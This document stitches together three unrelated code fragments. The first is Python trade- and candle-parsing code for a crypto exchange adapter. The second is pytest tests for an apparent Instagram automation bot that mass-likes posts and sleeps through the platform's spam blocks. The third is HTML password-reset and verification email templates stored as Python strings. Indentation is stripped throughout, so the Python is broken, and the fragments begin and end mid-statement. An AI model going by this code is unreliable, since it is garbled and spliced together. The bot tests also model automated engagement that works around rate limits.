# "filled_amount": "0.9845000000",
# "filled_fees": "0.0019690000",
# "created_at": 1494901400487
# }
#
# fetchOrderTrades(private)
#
# spot
#
# {
# "id":"614164775",
# "created_at":"1596298860602",
# "filled_amount":"0.0417000000000000",
# "filled_fees":"0.0000834000000000",
# "match_id":"673491702661292033",
# "order_id":"673491720340279296",
# "price":"359.240000000000",
# "source":"接口",
# "symbol":"eth_usdt",
# "type":"buy-market"
# }
#
# swap
#
# {
# "trade_id":"6667390",
# "symbol":"cmt_btcusdt",
# "order_id":"525946425993854915",
# "price":"9839.00",
# "order_qty":"3466",
# "fee":"-0.0000528407360000",
# "timestamp":"1561121514442",
# "exec_type":"M",
# "side":"3"
# }
#
symbol = None
marketId = self.safe_string(trade, 'symbol')
base = None
quote = None
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
symbol = market['symbol']
base = market['base']
quote = market['quote']
elif marketId is not None:
parts = marketId.split('_')
numParts = len(parts)
if numParts == 2:
baseId, quoteId = parts
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
else:
symbol = marketId.upper()
if (symbol is None) and (market is not None):
symbol = market['symbol']
base = market['base']
quote = market['quote']
timestamp = self.safe_integer(trade, 'created_at')
timestamp = self.safe_integer_2(trade, 'timestamp', 'ts', timestamp)
priceString = self.safe_string(trade, 'price')
amountString = self.safe_string_2(trade, 'filled_amount', 'order_qty')
amountString = self.safe_string_2(trade, 'size', 'amount', amountString)
takerOrMaker = self.safe_string_2(trade, 'exec_type', 'liquidity')
if takerOrMaker == 'M':
takerOrMaker = 'maker'
elif takerOrMaker == 'T':
takerOrMaker = 'taker'
orderType = self.safe_string(trade, 'type')
side = None
type = None
if orderType is not None:
side = self.safe_string(trade, 'type')
type = self.parse_order_type(side)
side = self.parse_order_side(side)
else:
side = self.safe_string_2(trade, 'side', 'direction')
type = self.parse_order_type(side)
side = self.parse_order_side(side)
feeCostString = self.safe_string(trade, 'fee')
if feeCostString is None:
feeCostString = self.safe_string(trade, 'filled_fees')
else:
feeCostString = Precise.string_neg(feeCostString)
fee = None
if feeCostString is not None:
feeCurrency = base if (side == 'buy') else quote
fee = {
# fee is either a positive number(invitation rebate)
# or a negative number(transaction fee deduction)
# therefore we need to invert the fee
# more about it https://github.com/ccxt/ccxt/issues/5909
'cost': feeCostString,
'currency': feeCurrency,
}
orderId = self.safe_string(trade, 'order_id')
id = self.safe_string_2(trade, 'trade_id', 'id')
return self.safe_trade({
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'id': id,
'order': orderId,
'type': type,
'takerOrMaker': takerOrMaker,
'side': side,
'price': priceString,
'amount': amountString,
'cost': None,
'fee': fee,
}, market)
async def fetch_trades(self, symbol, limit=None, since=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
method = None
if market['spot']:
method = 'dataGetMarketHistoryTrade'
elif market['swap']:
method = 'capiGetMarketTrades'
if market['spot']:
if limit is not None:
request['size'] = limit # default 1, max 2000
elif market['swap']:
if limit is None:
limit = 100 # default 20, max 100
request['limit'] = limit
response = await getattr(self, method)(self.extend(request, params))
#
# spot
#
# {
# "status":"ok",
# "ch":"market.btc_usdt.trade.detail",
# "ts":1595604968430,
# "data":{
# "ts":"1595604964000",
# "data":[
# {"id":"1","price":"9533.81","amount":"0.7326","direction":"sell","ts":"1595604964000"},
# {"id":"2","price":"9533.67","amount":"1.1591","direction":"buy","ts":"1595604961000"},
# {"id":"3","price":"9533.67","amount":"1.5022","direction":"sell","ts":"1595604959000"},
# ]
# }
# }
#
# swap
#
# [
# {"trade_id":"670833198971748613","price":"9578.50","size":"5412","side":"sell","timestamp":"1595665018790","symbol":"btcusd"},
# {"trade_id":"670833194240574915","price":"9579.00","size":"3972","side":"buy","timestamp":"1595665017662","symbol":"btcusd"},
# {"trade_id":"670833194240573915","price":"9579.00","size":"1227","side":"buy","timestamp":"1595665017662","symbol":"btcusd"},
# ]
#
trades = None
if isinstance(response, list):
trades = response
else:
data = self.safe_value(response, 'data', {})
trades = self.safe_value_2(data, 'data', [])
return self.parse_trades(trades, market, since, limit)
def parse_ohlcv(self, ohlcv, market=None, timeframe='1m'):
#
# spot
#
# {
# "id":"1594694700000",
# "amount":"283.6811",
# "count":"234",
# "open":"9230.00",
# "close":"9227.15",
# "low":"9206.66",
# "high":"9232.33",
# "vol":"2618015.032504000000"
# }
#
# swap
#
# [
# "1594693800000",
# "9240",
# "9241",
# "9222",
# "9228.5",
# "3913370",
# "424.003616350563"
# ]
#
options = self.safe_value(self.options, 'parseOHLCV', {})
volume = self.safe_value(options, 'volume', {})
if isinstance(ohlcv, list):
volumeIndex = self.safe_string(volume, market['type'], 'amount')
return [
self.safe_integer(ohlcv, 0), # timestamp
self.safe_number(ohlcv, 1), # Open
self.safe_number(ohlcv, 2), # High
self.safe_number(ohlcv, 3), # Low
self.safe_number(ohlcv, 4), # Close
# self.safe_number(ohlcv, 5), # Quote Volume
# self.safe_number(ohlcv, 6), # Base Volume
self.safe_number(ohlcv, volumeIndex), # Volume, bitget will return base volume in the 7th element for future markets
]
else:
volumeIndex = self.safe_value(volume, market['type'], 6)
return [
self.safe_integer(ohlcv, 'id'),
self.safe_number(ohlcv, 'open'), # Open
self.safe_number(ohlcv, 'high'), # High
self.safe_number(ohlcv, 'low'), # Low
self.safe_number(ohlcv, 'close'), # Close
self.safe_number(ohlcv, volumeIndex), # Base Volume
]
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
method = None
type = market['type']
options = self.safe_value(self.options, 'timeframes', {})
intervals = self.safe_value(options, type, {})
interval = self.safe_value(intervals, self.timeframes[timeframe])
if market['spot']:
method = 'dataGetMarketHistoryKline'
request['period'] = interval
if limit is not None:
request['size'] = limit # default 150, max 1000
elif market['swap']:
duration = self.parse_timeframe(timeframe)
method = 'capiGetMarketCandles'
request['granularity'] = interval
now = self.milliseconds()
if since is None:
if limit is None:
limit = 1000
request['start'] = self.iso8601(now - limit * duration * 1000)
request['end'] = self.iso8601(now)
else:
request['start'] = self.iso8601(since)
if | |
json=response_data,
status=200,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL, user_id=TEST_PHOTO_ITEM["user"]["pk"]
),
status=200,
json=response_data,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL, user_id=TEST_PHOTO_ITEM["user"]["pk"]
),
status=200,
json=response_data,
)
responses.add(
responses.POST,
"{api_url}media/{media_id}/like/".format(
api_url=API_URL, media_id=TEST_PHOTO_ITEM["id"]
),
status=200,
json={"status": "ok"},
)
self.bot.like_users(user_ids)
assert self.bot.total["likes"] == results_1
@responses.activate
@pytest.mark.parametrize(
"blocked_actions_protection,blocked_actions_sleep,result",
[(True, True, False), (True, False, True),
(False, True, False), (False, False, False)],
)
@patch("time.sleep", return_value=None)
def test_sleep_feedback_successful(
self, patched_time_sleep, blocked_actions_protection,
blocked_actions_sleep, result
):
self.bot.blocked_actions_protection = blocked_actions_protection
# self.bot.blocked_actions["likes"] = False
self.bot.blocked_actions_sleep = blocked_actions_sleep
media_id = 1234567890
response_data = {
u"status": u"fail",
u"feedback_title": u"You\u2019re Temporarily Blocked",
u"feedback_message": u"It looks like you were misusing this " +
u"feature by going too fast. You\u2019ve been temporarily " +
u"blocked from using it. We restrict certain content and " +
u"actions to protect our community. Tell us if you think we " +
u"made a mistake.",
u"spam": True,
u"feedback_action": u"report_problem",
u"feedback_appeal_label": u"Report problem",
u"feedback_ignore_label": u"OK",
u"message": u"feedback_required",
u"feedback_url": u"repute/report_problem/instagram_like_add/",
}
# first like blocked
responses.add(
responses.POST,
"{api_url}media/{media_id}/like/".format(
api_url=API_URL, media_id=media_id
),
json=response_data,
status=400,
)
# second like successful
responses.add(
responses.POST,
"{api_url}media/{media_id}/like/".format(
api_url=API_URL, media_id=media_id
),
status=200,
json={"status": "ok"},
)
# do 2 likes
self.bot.like(media_id, check_media=False)
self.bot.like(media_id, check_media=False)
assert self.bot.blocked_actions["likes"] == result
@responses.activate
@pytest.mark.parametrize(
"blocked_actions_protection,blocked_actions_sleep,result",
[(True, True, True), (True, False, True),
(False, True, False), (False, False, False)],
)
@patch("time.sleep", return_value=None)
def test_sleep_feedback_unsuccessful(
self, patched_time_sleep, blocked_actions_protection,
blocked_actions_sleep, result
):
self.bot.blocked_actions_protection = blocked_actions_protection
# self.bot.blocked_actions["likes"] = False
self.bot.blocked_actions_sleep = blocked_actions_sleep
media_id = 1234567890
response_data = {
u"status": u"fail",
u"feedback_title": u"You\u2019re Temporarily Blocked",
u"feedback_message": u"It looks like you were misusing this " +
u"feature by going too fast. You\u2019ve been temporarily " +
u"blocked from using it. We restrict certain content and " +
u"actions to protect our community. Tell us if you think we " +
u"made a mistake.",
u"spam": True,
u"feedback_action": u"report_problem",
u"feedback_appeal_label": u"Report problem",
u"feedback_ignore_label": u"OK",
u"message": u"feedback_required",
u"feedback_url": u"repute/report_problem/instagram_like_add/",
}
# both likes blocked
for x in range(1, 2):
responses.add(
responses.POST,
"{api_url}media/{media_id}/like/".format(
api_url=API_URL, media_id=media_id
),
json=response_data,
status=400,
)
# do 2 likes
self.bot.like(media_id, check_media=False)
self.bot.like(media_id, check_media=False)
assert self.bot.blocked_actions["likes"] == result
@responses.activate
@pytest.mark.parametrize(
"blocked_actions_protection,blocked_actions",
[(True, True), (True, False), (False, True), (False, True)],
)
@patch("time.sleep", return_value=None)
def test_like_feedback(
self, patched_time_sleep, blocked_actions_protection, blocked_actions
):
self.bot.blocked_actions_protection = blocked_actions_protection
self.bot.blocked_actions["likes"] = blocked_actions
media_id = 1234567890
response_data = {
u"status": u"fail",
u"feedback_title": u"You\u2019re Temporarily Blocked",
u"feedback_message": u"It looks like you were misusing this " +
u"feature by going too fast. You\u2019ve been temporarily " +
u"blocked from using it. We restrict certain content and " +
u"actions to protect our community. Tell us if you think we " +
u"made a mistake.",
u"spam": True,
u"feedback_action": u"report_problem",
u"feedback_appeal_label": u"Report problem",
u"feedback_ignore_label": u"OK",
u"message": u"feedback_required",
u"feedback_url": u"repute/report_problem/instagram_like_add/",
}
responses.add(
responses.POST,
"{api_url}media/{media_id}/like/".format(
api_url=API_URL, media_id=media_id
),
json=response_data,
status=400,
)
assert not self.bot.like(media_id, check_media=False)
@responses.activate
@pytest.mark.parametrize("medias", [[1234567890, 9876543210]])
@patch("time.sleep", return_value=None)
def test_like_medias(self, patched_time_sleep, medias):
self.bot._following = [1]
for media in medias:
TEST_PHOTO_ITEM["id"] = media
responses.add(
responses.GET,
"{api_url}media/{media_id}/info/".format(
api_url=API_URL, media_id=media
),
json={
"auto_load_more_enabled": True,
"num_results": 1,
"status": "ok",
"more_available": False,
"items": [TEST_PHOTO_ITEM],
},
status=200,
)
results = 2
response_data = {
"caption": TEST_CAPTION_ITEM,
"caption_is_edited": False,
"comment_count": 4,
"comment_likes_enabled": True,
"comments": [TEST_COMMENT_ITEM for _ in range(results)],
"has_more_comments": False,
"has_more_headload_comments": False,
"media_header_display": "none",
"preview_comments": [],
"status": "ok",
}
responses.add(
responses.GET,
"{api_url}media/{media_id}/comments/?".format(
api_url=API_URL, media_id=TEST_PHOTO_ITEM["id"]
),
json=response_data,
status=200,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL, user_id=TEST_PHOTO_ITEM["user"]["pk"]
),
status=200,
json=response_data,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL, user_id=TEST_PHOTO_ITEM["user"]["pk"]
),
status=200,
json=response_data,
)
responses.add(
responses.POST,
"{api_url}media/{media_id}/like/".format(
api_url=API_URL, media_id=TEST_PHOTO_ITEM["id"]
),
status=200,
json={"status": "ok"},
)
broken_items = self.bot.like_medias(medias)
assert [] == broken_items
@responses.activate
@pytest.mark.parametrize("hashtag", ["like_hashtag1", "like_hashtag2"])
@patch("time.sleep", return_value=None)
def test_like_hashtag(self, patche_time_sleep, hashtag):
self.bot._following = [1]
liked_at_start = self.bot.total["likes"]
results_1 = 10
my_test_photo_item = TEST_PHOTO_ITEM.copy()
my_test_photo_item["like_count"] = self.bot.min_likes_to_like + 1
my_test_photo_item["has_liked"] = False
response_data = {
"auto_load_more_enabled": True,
"num_results": results_1,
"status": "ok",
"more_available": True,
"next_max_id": my_test_photo_item["id"],
"items": [my_test_photo_item for _ in range(results_1)],
}
responses.add(
responses.GET,
(
"{api_url}feed/tag/{hashtag}/?max_id={max_id}" +
"&rank_token={rank_token}&ranked_content=true&"
).format(
api_url=API_URL,
hashtag=hashtag,
max_id="",
rank_token=self.bot.api.rank_token,
),
json=response_data,
status=200,
)
response_tag = {
"results": [
{
"id": 17841563287125205,
"name": hashtag,
"media_count": 7645915,
"follow_status": None,
"following": None,
"allow_following": None,
"allow_muting_story": None,
"profile_pic_url": "https://instagram.fmxp6-1.fna.fbcdn." +
"net/vp/8e512ee62d218765d3ac46f3da6869de/5E0E0DE3/t51.28" +
"85-15/e35/c148.0.889.889a/s150x150/67618693_24674373801" +
"56007_7054420538339677194_n.jpg?_nc_ht=instagram.fmxp6-" +
"1.fna.fbcdn.net&ig_cache_key=<KEY>" +
"%3D%3D.2.c",
"non_violating": None,
"related_tags": None,
"subtitle": None,
"social_context": None,
"social_context_profile_links": None,
"follow_button_text": None,
"show_follow_drop_down": None,
"formatted_media_count": "7.6M",
"debug_info": None,
"search_result_subtitle": "7.6M posts",
}
]
}
responses.add(
responses.GET,
(
"{api_url}tags/search/?is_typeahead=true&q={query}" +
"&rank_token={rank_token}"
).format(
api_url=API_URL,
query=hashtag,
rank_token=self.bot.api.rank_token
),
json=response_tag,
status=200,
)
responses.add(
responses.GET,
"{api_url}media/{media_id}/info/".format(
api_url=API_URL, media_id=my_test_photo_item["id"]
),
json={
"auto_load_more_enabled": True,
"num_results": 1,
"status": "ok",
"more_available": False,
"items": [my_test_photo_item],
},
status=200,
)
results_2 = 2
response_data = {
"caption": TEST_CAPTION_ITEM,
"caption_is_edited": False,
"comment_count": results_2,
"comment_likes_enabled": True,
"comments": [TEST_COMMENT_ITEM for _ in range(results_2)],
"has_more_comments": False,
"has_more_headload_comments": False,
"media_header_display": "none",
"preview_comments": [],
"status": "ok",
}
responses.add(
responses.GET,
"{api_url}media/{media_id}/comments/?".format(
api_url=API_URL, media_id=TEST_PHOTO_ITEM["id"]
),
json=response_data,
status=200,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL, user_id=my_test_photo_item["user"]["pk"]
),
status=200,
json=response_data,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL, user_id=my_test_photo_item["user"]["pk"]
),
status=200,
json=response_data,
)
responses.add(
responses.POST,
"{api_url}media/{media_id}/like/".format(
api_url=API_URL, media_id=my_test_photo_item["id"]
),
status=200,
json={"status": "ok"},
)
broken_items = self.bot.like_hashtag(hashtag)
assert [] == broken_items
assert self.bot.total["likes"] == liked_at_start + results_1
@responses.activate
@pytest.mark.parametrize("username", ["1234567890", 1234567890])
@patch("time.sleep", return_value=None)
def test_like_followers(self, patched_time_sleep, username):
liked_at_start = self.bot.total["likes"]
test_username = "test.username"
response_data_1 = {"status": "ok", "user": TEST_SEARCH_USERNAME_ITEM}
responses.add(
responses.GET,
"{api_url}users/{username}/usernameinfo/".format(
api_url=API_URL, username=test_username
),
status=200,
json=response_data_1,
)
response_data_2 = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL,
user_id=username
),
status=200,
json=response_data_2,
)
results_3 = 2
response_data_3 = {
"status": "ok",
"big_list": False,
"next_max_id": None,
"sections": None,
"users": [TEST_FOLLOWER_ITEM for _ in range(results_3)],
}
responses.add(
responses.GET,
(
"{api_url}friendships/{user_id}/followers/" +
"?rank_token={rank_token}"
).format(
api_url=API_URL,
user_id=username,
rank_token=self.bot.api.rank_token
),
json=response_data_3,
status=200,
)
self.bot._following = [1]
TEST_USERNAME_INFO_ITEM["biography"] = "instabot"
my_test_photo_item = TEST_PHOTO_ITEM.copy()
my_test_photo_item["like_count"] = self.bot.min_likes_to_like + 1
my_test_photo_item["has_liked"] = False
response_data = {"status": "ok", "user": TEST_SEARCH_USERNAME_ITEM}
responses.add(
responses.GET,
"{api_url}users/{username}/usernameinfo/".format(
api_url=API_URL, username=username
),
status=200,
json=response_data,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL,
user_id=username
),
status=200,
json=response_data,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL,
user_id=username
),
status=200,
json=response_data,
)
results_4 = 3
response_data = {
"auto_load_more_enabled": True,
"num_results": results_4,
"status": "ok",
"more_available": False,
"items": [my_test_photo_item for _ in range(results_4)],
}
responses.add(
responses.GET,
(
"{api_url}feed/user/{user_id}/?max_id={max_id}&min_timestamp" +
"={min_timestamp}&rank_token={rank_token}&ranked_content=true"
).format(
api_url=API_URL,
user_id=username,
max_id="",
min_timestamp=None,
rank_token=self.bot.api.rank_token,
),
json=response_data,
status=200,
)
responses.add(
responses.GET,
"{api_url}media/{media_id}/info/".format(
api_url=API_URL, media_id=my_test_photo_item["id"]
),
json={
"auto_load_more_enabled": True,
"num_results": 1,
"status": "ok",
"more_available": False,
"items": [my_test_photo_item],
},
status=200,
)
results_5 = 2
response_data = {
"caption": TEST_CAPTION_ITEM,
"caption_is_edited": False,
"comment_count": results_5,
"comment_likes_enabled": True,
"comments": [TEST_COMMENT_ITEM for _ in range(results_5)],
"has_more_comments": False,
"has_more_headload_comments": False,
"media_header_display": "none",
"preview_comments": [],
"status": "ok",
}
responses.add(
responses.GET,
"{api_url}media/{media_id}/comments/?".format(
api_url=API_URL, media_id=my_test_photo_item["id"]
),
json=response_data,
status=200,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL, user_id=my_test_photo_item["user"]["pk"]
),
status=200,
json=response_data,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL, user_id=my_test_photo_item["user"]["pk"]
),
status=200,
json=response_data,
)
responses.add(
responses.POST,
"{api_url}media/{media_id}/like/".format(
api_url=API_URL, media_id=my_test_photo_item["id"]
),
status=200,
json={"status": "ok"},
)
self.bot.like_followers(username)
assert self.bot.total["likes"] == \
liked_at_start + results_3 * results_4
@responses.activate
@pytest.mark.parametrize("username", ["1234567890", 1234567890])
@patch("time.sleep", return_value=None)
def test_like_following(self, patched_time_sleep, username):
liked_at_start = self.bot.total["likes"]
test_username = "test.username"
response_data_1 = {"status": "ok", "user": TEST_SEARCH_USERNAME_ITEM}
responses.add(
responses.GET,
"{api_url}users/{username}/usernameinfo/".format(
api_url=API_URL, username=test_username
),
status=200,
json=response_data_1,
)
response_data_2 = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL,
user_id=username
),
status=200,
json=response_data_2,
)
results_3 = 5
response_data_3 = {
"status": "ok",
"big_list": False,
"next_max_id": None,
"sections": None,
"users": [TEST_FOLLOWING_ITEM for _ in range(results_3)],
}
responses.add(
responses.GET,
(
"{api_url}friendships/{user_id}/following/?max_id={max_id}" +
"&ig_sig_key_version={sig_key}&rank_token={rank_token}"
).format(
api_url=API_URL,
user_id=username,
rank_token=self.bot.api.rank_token,
sig_key=SIG_KEY_VERSION,
max_id="",
),
json=response_data_3,
status=200,
)
self.bot._following = [1]
TEST_USERNAME_INFO_ITEM["biography"] = "instabot"
my_test_photo_item = TEST_PHOTO_ITEM.copy()
my_test_photo_item["like_count"] = self.bot.min_likes_to_like + 1
my_test_photo_item["has_liked"] = False
response_data = {"status": "ok", "user": TEST_SEARCH_USERNAME_ITEM}
responses.add(
responses.GET,
"{api_url}users/{username}/usernameinfo/".format(
api_url=API_URL, username=username
),
status=200,
json=response_data,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL,
user_id=username
),
status=200,
json=response_data,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL,
user_id=username
),
status=200,
json=response_data,
)
results_4 = 3
response_data = {
"auto_load_more_enabled": True,
"num_results": results_4,
"status": "ok",
"more_available": False,
"items": [my_test_photo_item for _ in range(results_4)],
}
responses.add(
| |
<gh_stars>0
file_forgot_password = ["""<!DOCTYPE html>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<style type="text/css">
@media screen {
@font-face {
font-family: 'Lato';
font-style: normal;
font-weight: 400;
src: local('Lato Regular'), local('Lato-Regular'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format('woff');
}
@font-face {
font-family: 'Lato';
font-style: normal;
font-weight: 700;
src: local('Lato Bold'), local('Lato-Bold'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format('woff');
}
@font-face {
font-family: 'Lato';
font-style: italic;
font-weight: 400;
src: local('Lato Italic'), local('Lato-Italic'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format('woff');
}
@font-face {
font-family: 'Lato';
font-style: italic;
font-weight: 700;
src: local('Lato Bold Italic'), local('Lato-BoldItalic'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format('woff');
}
}
/* CLIENT-SPECIFIC STYLES */
body,
table,
td,
a {
-webkit-text-size-adjust: 100%%;
-ms-text-size-adjust: 100%%;
}
table,
td {
mso-table-lspace: 0pt;
mso-table-rspace: 0pt;
}
img {
-ms-interpolation-mode: bicubic;
}
/* RESET STYLES */
img {
border: 0;
height: auto;
line-height: 100%%;
outline: none;
text-decoration: none;
}
table {
border-collapse: collapse !important;
}
body {
height: 100%% !important;
margin: 0 !important;
padding: 0 !important;
width: 100%% !important;
}
/* iOS BLUE LINKS */
a[x-apple-data-detectors] {
color: inherit !important;
text-decoration: none !important;
font-size: inherit !important;
font-family: inherit !important;
font-weight: inherit !important;
line-height: inherit !important;
}
/* MOBILE STYLES */
@media screen and (max-width:600px) {
h1 {
font-size: 32px !important;
line-height: 32px !important;
}
}
/* ANDROID CENTER FIX */
div[style*="margin: 16px 0;"] {
margin: 0 !important;
}
</style>
</head>
<body style="background-color: #f4f4f4; margin: 0 !important; padding: 0 !important;">
<!-- HIDDEN PREHEADER TEXT -->
<div style="display: none; font-size: 1px; color: #fefefe; line-height: 1px; font-family: 'Lato', Helvetica, Arial, sans-serif; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden;"> We're thrilled to have you here! Get ready to dive into your new account. </div>
<table border="0" cellpadding="0" cellspacing="0" width="100%%">
<!-- LOGO -->
<tr>
<td bgcolor="#FFA73B" align="center">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td align="center" valign="top" style="padding: 40px 10px 40px 10px;"> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#FFA73B" align="center" style="padding: 0px 10px 0px 10px;">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td bgcolor="#ffffff" align="center" valign="top" style="padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px;">
<h1 style="font-size: 48px; font-weight: 400; margin: 2;">Welcome!</h1> <img src=" https://img.icons8.com/clouds/100/000000/handshake.png" width="125" height="120" style="display: block; border: 0px;" />
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#f4f4f4" align="center" style="padding: 0px 10px 0px 10px;">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td bgcolor="#ffffff" align="left" style="padding: 20px 30px 40px 30px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<p style="margin: 0;">We're excited to have you get started. First, you need to confirm your account. Just press the button below.</p>
</td>
</tr>
<tr>
<td bgcolor="#ffffff" align="left">
<table width="100%%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor="#ffffff" align="center" style="padding: 20px 30px 60px 30px;">
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="center" style="border-radius: 3px;" bgcolor="#FFA73B"><a href="secret_key" target="_blank" style="font-size: 20px; font-family: Helvetica, Arial, sans-serif; color: #ffffff; text-decoration: none; color: #ffffff; text-decoration: none; padding: 15px 25px; border-radius: 2px; border: 1px solid #FFA73B; display: inline-block;">Reset Password</a></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr> <!-- COPY -->
<tr>
<td bgcolor="#ffffff" align="left" style="padding: 0px 30px 0px 30px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<p style="margin: 0;">If that doesn't work, copy and paste the following link in your browser:</p>
</td>
</tr> <!-- COPY -->
<tr>
<td bgcolor="#ffffff" align="left" style="padding: 20px 30px 20px 30px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<p style="margin: 0;"><a href="#" target="_blank" style="color: #FFA73B;">""","""</a></p>
</td>
</tr>
<tr>
<td bgcolor="#ffffff" align="left" style="padding: 0px 30px 20px 30px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<p style="margin: 0;">If you have any questions, just reply to this email—we're always happy to help out.</p>
</td>
</tr>
<tr>
<td bgcolor="#ffffff" align="left" style="padding: 0px 30px 40px 30px; border-radius: 0px 0px 4px 4px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<p style="margin: 0;">Cheers,BBB Team</p>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#f4f4f4" align="center" style="padding: 30px 10px 0px 10px;">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td bgcolor="#FFECD1" align="center" style="padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;">
<h2 style="font-size: 20px; font-weight: 400; color: #111111; margin: 0;">Need more help?</h2>
<p style="margin: 0;"><a href="#" target="_blank" style="color: #FFA73B;">We’re here to help you out</a></p>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#f4f4f4" align="center" style="padding: 0px 10px 0px 10px;">
<table border="0" cellpadding="0" cellspacing="0" width="100%%" style="max-width: 600px;">
<tr>
<td bgcolor="#f4f4f4" align="left" style="padding: 0px 30px 30px 30px; color: #666666; font-family: 'Lato', Helvetica, Arial, sans-serif; font-size: 14px; font-weight: 400; line-height: 18px;">
<p style="margin: 0;">If these emails get annoying, please feel free to <a href="#" target="_blank" style="color: #111111; font-weight: 700;">unsubscribe</a>.</p>
</td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</html>
"""]
file_verification_email = ["""<!DOCTYPE html>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<style type="text/css">
@media screen {
@font-face {
font-family: 'Lato';
font-style: normal;
font-weight: 400;
src: local('Lato Regular'), local('Lato-Regular'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format('woff');
}
@font-face {
font-family: 'Lato';
font-style: normal;
font-weight: 700;
src: local('Lato Bold'), local('Lato-Bold'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format('woff');
}
@font-face {
font-family: 'Lato';
font-style: italic;
font-weight: 400;
src: local('Lato Italic'), local('Lato-Italic'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format('woff');
}
@font-face {
font-family: 'Lato';
font-style: italic;
font-weight: 700;
